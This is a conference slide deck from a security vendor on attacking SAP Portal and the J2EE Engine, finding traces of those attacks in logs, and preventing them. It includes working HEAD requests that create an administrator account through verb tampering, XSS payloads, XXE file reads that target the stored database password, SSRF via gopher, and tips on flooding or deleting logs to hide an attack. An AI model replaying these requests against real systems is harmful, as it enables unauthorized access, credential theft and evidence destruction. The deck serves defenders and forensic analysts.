SlideShare a Scribd company logo

Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine

ERPScan
ERPScan

SAP is the most popular business application with more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible. The presentation provides examples of simple and advanced attacks along with ways to avoid them.

Software
1 of 63
Download to read offline
Invest  in  security   to  secure  investments   Breaking,  forensica/ng  and   an/-­‐forensica/ng  SAP  Portal   and  J2EE  Engine  
About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu8on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta/ons  key  security  conferences  worldwide   •  25  Awards  and  nomina/ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
Agenda   3   •  Why  SAP   •  Why  SAP  forensics   •  Why  it  is  hard   •  AJack  examples  and  forensics   –  Simple  aJacks   –  Advanced  aJacks   •  Defense   •  Conclusion  
•  The  most  popular  business  applica8on   •  More  than  180000  customers  worldwide     •  74%  of  Forbes  500  run  SAP   •  300+  clients  in  South  Africa  by  2004   •  Almost  every  South  Africa  Government  runs  SAP     SAP   4  
•  Espionage   –  TheX  of  Financial  Informa8on   –  Corporate  Secret  and  informa8on  theX   –  Supplier  and  Customer  list  theX   –  HR  data  theX     •  Sabotage   –  Denial  of  service   –  Tampering  with  financial  records   –  Access  to  technology  network  (SCADA)  by  trust  rela8ons   •  Fraud   –  False  transac8ons   –  Modifica8on  of  master  data     5   Why  SAP  Security?  
hJp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     0 100 200 300 400 500 600 700 800 900 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 How  easy?  SAP  Security  Notes   6  
0 5 10 15 20 25 30 35 2006 2007 2008 2009 2010 2011 2012 •  BlackHat     •  HITB     •  Troopers     •  RSA     •  Source     •  ITWeb   •  DeepSec       Point  Source:  SAP  Security  in  Figures  2013   Is  it  popular?  Talks  about  SAP  security   7  
hJp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     Is  it  remotely  exploitable?   8  
9   Is  it  relevant  for  South  Africa?   Simple  scan  for  SAP  routers  exposed  to  the  Internet:   •   63  SAP  Routers  found  in  the  default  port   •   27  SAP  Routers  with  medium-­‐cri8cal  issues   •   7  SAP  Routers  with  high-­‐cri8cal  issues   Number  of  Web-­‐based  SAP  Systems  found:   •   20  by  Shodan  
0 2 4 6 8 10 12 14 16 SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd World hJp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     10   What  about  other  services?  
*  This  aJack  has  not  been  confirmed  by  the  customer  nor  by  the  police  authori8es  in  Greece   inves8ga8ng  the  case.  SAP  does  not  have  any  indica8on  that  it  happened.   Now, it adds, “We gained full access to the Greek Ministry of Finance. Those funky IBM servers don't look so safe now, do they...” Anonymous claims to have a “sweet 0day SAP exploit”, and the group intends to “sploit the hell out of it.” 11   Who  actually  tried  to  break  SAP?  
12   What  about  unpublished  threats?   •  Companies  are  not  interested  in  publishing  informa8on  about   their  breaches   •  There  are  a  lot  of  internal  breaches  thanks  to  unnecessarily   given  authoriza8ons  (An  employee  by  mistake  buys  hundreds  of   excavators  instead  of  ten)   •  There  are  known  stories  about  backdoors  leX  by  developers  in   custom  ABAP  code   •  How  can  you  be  sure  that,  if  a  breach  occurs,  you  can  find   evidence?  
hJp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     13   SAP  Forensics   •  If  there  are  no  aJacks,  it  doesn’t  mean  anything   •  Companies  don’t  like  to  share  it   •  Companies  don’t  use  security  audit  ~10%   •  Even  if  used,  nobody  manages  it  ~5%   •  Even  if  managed,  no  correla8on  ~1%  
14   Typical  SAP  audit  op/ons     •  ICM  log  icm/HTTP/logging_0  70%     •  Security  audit  log  in  ABAP    10%   •  Table  access  logging  rec/client  4%   •  Message  Server  log  ms/audit  2%   •  SAP  Gateway  access  log    2%   •   %  of  companies  (based  on  our  security  assessments  and   product  implementa8ons)    
hJp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     What  do  we  see?   15   •  A  lot  of  research   •  Real  aJacks   •  Lack  of  logging  prac8ce   •  Many  vulnerabili8es  are  hard  to  close  →  We  need  to  monitor   them,  at  least    
• Ideally, we should control everything, but this talk has limits, so let’s focus on the most critical areas What  do  we  need  to  monitor?     External  aYacks  on  SAP   16   • Awareness   AJack  users   and  SAP  GUI   • Secure  configura8on  and  patch  management    SAP  Router   • Disable  them   Exposed  SAP   services   • Too  much  issues  and  custom  configura8on   • May  be  0-­‐days   • Need  to  concentrate  on  this  area     SAP  Portal    
17   SAP  Portal   •  Point  of  web  access  to  SAP  systems   •  Point  of  web  access  to  other  corporate  systems   •  Way  for  aJackers  to  get  access  to  SAP  from  the  Internet  
18   Portal  architecture  
19   Let’s  begin  the  technical  part   Full  logging  is  not  always  the  best  op/on   *not  only  because  of  system  highload  
20   Full  logging  is  not  always  the  best  op/on   •  SAP  MMC  –  centralized  system  management   •  Allowing  to  see  the  trace  and  log  messages   •  If  TRACE_LEVEL  =  3  →  JSESSIONIDs  are  stored  in  logs   •  <SID>DVEBMGS<id>j2eeclusterserver0logsystem userinterface.log   •  It’s  not  bad  if  you  only  use  it  some8mes  and  delete  logs  aXer   use,  but…  
21   But  some/mes     •  SAP  MMC  has  remote  commands   •  By  default,  many  commands  go  without  auth   •  Commands  are  simple  SOAP  requests   •  AJacker  can  read  logs  without  auth   •  And  read  JSESSIONIDs  stored  in  logs     •  And  use  them  for  logging  into  SAP  Portal  
hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   22   Preven/on   •  Don’t  use  TRACE_LEVEL  =  3   •  Delete  traces  when  work  is  finished   •  Limit  access  to  dangerous  methods   •  Install  notes  927637  and  1439348   •  Mask  security-­‐sensi/ve  data  in  HTTP  access  log    
•  The  HTTP  Provider  service  can  mask  security-­‐sensi8ve   URL  parameters,  cookies,  or  headers         •  By  default,  only  for  headers  listed  below   -  Path  Parameter:  jsessionid   -  Request  Parameters:  j_password,    j_username,   j_sap_password,  j_sap_again,  oldPassword,   confirmNewPassword,8cket   -  HTTP  Headers:  Authoriza8on,  Cookie  (JSESSIONID,   MYSAPSSO2)   hJp://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm   23   Masking  security-­‐sensi/ve  data  in  HTTP  log  
SAP  AJacks  and   Forensics     *  Only  J2EE  engine     24  
If  you  are  running  an  ABAP  +  Java  installa9on  of  Web  AS  with  SAP   Web  Dispatcher  as  a  load  balancing  solu9on,  you  can  safely  disable   logging  of  HTTP  requests  and  responses  on  J2EE  Engine,  and  use  the   corresponding  CLF  logs  of  SAP  Web  Dispatcher.  This  also  improves   the  HTTP  communica9on  performance.  The  only  drawback  of  using   the   Web   Dispatcher’s   CLF   logs   is   that   no   informa4on   is   available   about   the   user   execu4ng   the   request   (since   the   user   is   not   authen9cated   on   the   Web   Dispatcher,   but   on   the   J2EE   Engine   instead).         *Not  the  only….  There  are  many  complex  a>acks  with  POST   requests.   hJp://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm   25   SAP  Logging  
hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   SAP  J2EE  Logging   26   •  Categories  of  system  events  recording:   -  System  –  all  system  related  security  and  administra8ve  logs.   -  Applica8ons  –  all  system  events  related  to  business  logic.   -  Performance  –  reserved  for  single  ac8vity  tracing.   •  Default  loca8on  of  these  files  in  your  file  system  usrsap<sid> <id>j2eecluster<node>log   •  The  developer  trace  files  of  the  Java  instance   -  <SID><instance  name>work   •  The  developer  trace  files  of  the  central  services   -  <SID><instance  name>work   -  <SID><instance  name>log   •  Java  server  logs   -  <SID><instance  name>j2eeclusterserver<n>log  
•  Informa8on  disclosure  and  XSS   •       Verb  Tampering  via  HEAD   •       Invoker  servlet  via  GET   All  that  can  be  found  in  HTTP  headers.   j2eecluster<node>logsystemhttpaccess responses.trc   27   Simple  aYacks  
hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   28   XSS:  Forensics   #Plain###192.168.192.26 : GET /irj/ servlet/prt/portal/prtroot/ com.sap.portal.usermanagement.admin.Us erMapping?systemid=MS_EXCHANGEaaaa%3C/ script%3E%3Cscript%3Ealert(%27xSS %27)%3C/script%3E HTTP/1.1 200 3968#  
• <servlet> •  <servlet-name>CriticalAction</servlet-name> •  <servlet-class>com.sap.admin.Critical.Action</ servlet-class> • </servlet> • <servlet-mapping> •  <servlet-name>CriticalAction</</servlet-name> •  <url-pattern>/admin/critical</url-pattern> •  </servlet-mapping • <security-constraint> • <web-resource-collection> • <web-resource-name>Restrictedaccess</web-resource-name> • <url-pattern>/admin/*</url-pattern> • <http-method>GET</http-method> • </web-resource-collection> • <auth-constraint> <role-name>administrator</role-name> </auth-constraint> • </security-constraint> 29   Verb  Tampering:  Descrip/on  (web.xml)  
  •  Create  a  new  user  ITWEB:ITWEB     HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB       •       Add  the  user  ITWEB  to  the  group  Administrators     HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;ADD_USER_TO_GROUP;USERNAME=ITWEB,GROUPNAME=Administrators       Works  when  UME  uses  JAVA  database       30   Verb  Tampering:  AYack    
•     Install  SAP  Notes  1503579,  1616259     •     Install  other  SAP  Notes  about  Verb  Tampering       •     Scan  applica8ons  with  ERPScan  WEB.XML  checker     •     Disable  the  applica8ons  that  are  not  necessary     31   Verb  Tampering:  Preven/on  
[Apr  3,  2013  1:23:59  AM      ]  -­‐  192.168.192.14  :   GET  /ctc/ConfigServlet  HTTP/1.1  401  1790   [Apr  3,  2013  1:30:01  AM      ]  -­‐  192.168.192.14  :   HEAD  /ctc/ConfigServlet? param=com.sap.ctc.u8l.UserConfig;CREATEUSER;U SERNAME=ITWEB,PASSWORD=ITWEB  HTTP/1.0   200  0     32   Verb  Tampering:  Forensics  
33   Invoker  Servlet:  AYack  
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/ Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/ a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl: 3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:hacker | | SET_ATTRIBUTE: uniquename=[hacker]# #1.5#000C29C2603300790000003B000008700004D974E7CD3828#1364996035234#/System/Security/ Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e26]#n/ a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl: 3]_22##0#0#Warning#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USERACCOUNT.CREATE | UACC.PRIVATE_DATASOURCE.un:hacker | | SET_ATTRIBUTE: userid=[USER.PRIVATE_DATASOURCE.un:hacker]# #1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/ J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/ a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl: 3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE- Engine#guests# hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   34   Invoker  Servlet:  Forensics  (user  crea/on)  
hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   35   Invoker  Servlet:  Forensics  (user  crea/on)  
• Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” must be “false” • Check all WEB.XML files with ERPScan WEBXML checker 36   Invoker  servlet:  Preven/on  
  •     Overwrite  log  file  with  trash  requests   •     Disable  logs  (need  server  restart)     •     Delete  logs  (not  so  easy)           *  There  should  be  a  separate  place  for  logs  to  prevent  modifica4ons  and  find   those  types  of  a>acks     37   An/-­‐forensics  for  simple  aYacks  
  •       CSRF  in  Webdynpro  JAVA   •       XXE  in  Portal   •       Malicious  upload  in  Portal     *  They  all  need  addi4onal  analysis,  like  enabling   POST  data  logging  or  indirect  signs   38   Advanced  aYacks  
•       Webdynpro  unauthorized  modifica8ons     •       For  example:   -  somebody  steals  an  account  using  XSS/CSRF/Sniffing   -  then  tries  to  modify  the  severity  level  of  logs   39   Advanced  aYacks:  webdynpro  JAVA  
hJp://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htm   40   Advanced  aYacks:  webdynpro  JAVA  
•  No  traces  of  change  in  default  log  files   clusterserver0logsystemhttpaccessresponses.log •  Webdynpro  sends  all  data  by  POST,  and  we  only  see  GET  URLs  in   responses.log     •  But  some8mes  we  can  find  informa8on  by  indirect  signs   [Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET / webdynpro/resources/sap.com/ tc~lm~webadmin~log_config~wd/Components/ com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110 •  Client  loaded  images  from  server  during  some  changes   41   Advanced  aYacks:  webdynpro  JAVA  
•  Most  ac8ons  have  icons     •  They  have  to  be  loaded  from  the  server     •  Usually,  legi8mate  users  have  them  all  in  cache   •  AJackers  usually  don’t  have  them,  so  they  make  requests  to   the  server   •  That’s  how  we  can  iden8fy  poten8ally  malicious  ac8ons   •  But  there  should  be  correla8on  with  a  real  user’s  ac8vity   •  False  posi8ves  are  possible:   -  New  legi8mate  user     -  Old  user  clears  cache   -  Other   42   webdynpro  JAVA:  Forensics  
•       Injec8on  of  malicious  requests  into  XML  packets   •       Can  lead  to  unauthorized  file  read,  DoS,  SSRF     •       There  is  an  XXE  vulnerability  in  SAP  Portal   •       Can  be  exploited  by  modifica8on  of  POST  request   •       It  is  possible  to  read  any  file  from  OS  and  much  more   43   XXE  in  Portal:  Details  
44   XXE  in  Portal:  AYack  
45   XXE  in  Portal:  Details  
46   XXE  in  Portal:  AYack  
•  We can read any file •  Including config with passwords •  The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: •  usrsap<SID>SYSglobalsecuritydata SecStore.properties 47   XXE  in  Portal:  Result    
•   Install  SAP  note  1619539   •   Restrict  read  access  to  files  SecStore.proper9es  and   SecStore.key   48   XXE  in  Portal:  Preven/on  
POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/ prtroot/pcd!3aportal_content!2fadministrator! 2fsuper_admin!2fsuper_admin_role! 2fcom.sap.portal.content_administration! 2fcom.sap.portal.content_admin_ws! 2fcom.sap.km.AdminContent! 2fcom.sap.km.AdminContentExplorer! 2fcom.sap.km.AdminExplorer/ HTTP/1.1 49   XXE  in  Portal:  Forensics  Fail  
XXE  in  Portal:  Forensics   •  The only one way to get HTTP POST request values is to enable HTTP Trace. •  Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable. -  For 6.4 and 7.0 SP 12 and lower: o  On Dispatcher /j2ee/cluster/dispatcher/log/ defaultTrace.trc o  On Server j2eeclusterserver0logsystemhttpaccessresponses.0.trc -  For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/ req_resp.trc •  And then you need to manually analyze all requests if there are any XXE attacks. 50  
51   Malicious  file  upload:  AYack   •  Knowledge management allows to upload to the server different types of files that can store malicious content •  Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user •  For example, it can be an HTML file with JavaScript that steals cookies
hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   52   Malicious  file  upload:  AYack  
53   Malicious  file  upload:  AYack  
Malicious  file  upload:  Forensics   •  [Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/ HtmlbEvent/prtroot/pcd!3aportal_content! 2fspecialist!2fcontentmanager!2fContentManager! 2fcom.sap.km.ContentManager! 2fcom.sap.km.ContentExplorer! 2fcom.sap.km.ContentDocExplorer! 2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968 •  [Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/ html.gif HTTP/1.1 200 165 •  *Again, images can help us 54  
55   Malicious  file  upload:  Preven/on   •  Enable  File  Extension  and  Size  Filter.   -  System  Administra9on  →  System  Configura9on  →  Content  Management  →     Repository  →  Filters  →  Show  Advanced  Op9ons  →  File  Extension  and  Size   Filter     -  you  must  select  either  the  All  repositories  parameter,  or  at  least  one   repository  from  the  repository  list  in  the  Repositories  parameter.  Otherwise,   the  filter  is  not  created.   •  Enable  Malicious  Script  Filter.   -  System  Administra9on  →  System  Configura9on  →  Content  Management  →     Repository  →  Filters  →  Show  Advanced  Op9ons  →  Malicious  Script  Filter     -  the  filter  also  detects  executable  scripts  in  files  that  are  being  modified  and   encodes  them  when  they  are  saved   o  enable  Forbidden  Scripts.  Comma-­‐separated  list  of  banned  script  tags   that  will  be  encoded  when  the  filter  is  applied.   o  enable  the  Send  E-­‐Mail  to  Administrator  op/on.  
56   Filtering  EPCF  in  XSS     •  EPCF  provides  a  JavaScript  API  for  client-­‐side  communica8on   between  the  Portal  components  and  the  Portal  core  framework   •  EPCM  (Enterprise  Portal  Client  Manager)   •  iViews  can  access  the  EPCM  object  from  every  page   •  Every  iView  contains  the  EPCM  object   •  For  example,  EPCF  is  used  for  tranmit  user  data  buffer  for   iViews   •  <SCRIPT>alert(EPCM.loadClientData("urn:com.sap.myObjects“,"person");</SCRIPT>  
57   Advanced  aYacks:  An/-­‐Forensics   •  If  all  trace  is  enabled,  it  can  downgrade  speed   •  It  can  also  occupy  all  the  storage  volume   •  If  an  aJacker  want  to  spam  logs  with  trash  values,  he  can  do  it   much  faster  than  just  with  GET  logs  
58   Securing  SAP  Portal   •  Patching •  Secure configuration •  Enabling HTTP Trace with masking •  Malicious script filter •  Log archiving •  Additional place for log storage •  Correlation of security events
And  one  more  thing:     •  Portal  has  connec8ons  with  a  lot  of  systems  in  corporate  LAN   •  Using  SSRF,  aJackers  can  get  access  to  these  systems     59   Portal  post-­‐exploita/on  
HTTP  Server    Corporate   network   Direct  aJack      GET  /vuln.jsp     SSRF  AJack     SSRF  AJack     Get  /vuln.jst     A   B   60   SSRF  aYacks  
  hJp://erpscan.com/wp-­‐content/uploads/2012/08/SSRF-­‐vs-­‐Businness-­‐cri8cal-­‐applica8ons-­‐whitepaper.pdf   61   Gopher  uri  scheme   Using  gopher://  uri  scheme,  it  is  possible  to  send  TCP   packets   •   Exploit  OS  vulnerabili8es   •   Exploit  old  SAP  applica/on  vulnerabili/es     •   Bypass  SAP  security  restric8ons   •   Exploit  vulnerabili8es  in  local  services       More  info  in  our  BH2012  presenta8on:   SSRF  vs.  Business  Cri9cal  Applica9ons  
It  is  possible  to  protect  yourself  from  these  kinds  of  issues,     and  we  are  working  close  with  SAP  to  keep  customers  secure   SAP  Guides   It’s  all  in  your  hands   Regular  security  assessments   ABAP  code  review   Monitoring  technical  security   Segrega/on  of  Du/es   62   Conclusion  
Future  work   •  I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations: •  May 21 – Training at AusCert (Gold Coast, Australia) •  June 5-6 – Presentation at RSA (Marina Bay Sands, Singapore) •  September 10-12 – BlackHat Trainings (Istanbul, Turkey) 63  

Recommended

Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
ERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
ERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
ERPScan
 

Recommended

Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
ERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
ERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
ERPScan
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
ERPScan
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to us
ERPScan
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and best
ERPScan
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
ERPScan
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)
ERPScan
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
ERPScan
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
ERPScan
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
ERPScan
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
ERPScan
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
ERPScan
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
ERPScan
 
Sap Security Hacks and Mitigation - Timeless Attacks
Sap Security Hacks and Mitigation - Timeless AttacksSap Security Hacks and Mitigation - Timeless Attacks
Sap Security Hacks and Mitigation - Timeless Attacks
Ertunga Arsal
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscape
ERPScan
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
Onapsis Inc.
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
ERPScan
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects Attacks
Onapsis Inc.
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
ERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
ERPScan
 

More Related Content

What's hot

SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
ERPScan
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to us
ERPScan
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and best
ERPScan
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
ERPScan
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)
ERPScan
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
ERPScan
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
ERPScan
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
ERPScan
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
ERPScan
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
ERPScan
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
ERPScan
 
Sap Security Hacks and Mitigation - Timeless Attacks
Sap Security Hacks and Mitigation - Timeless AttacksSap Security Hacks and Mitigation - Timeless Attacks
Sap Security Hacks and Mitigation - Timeless Attacks
Ertunga Arsal
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
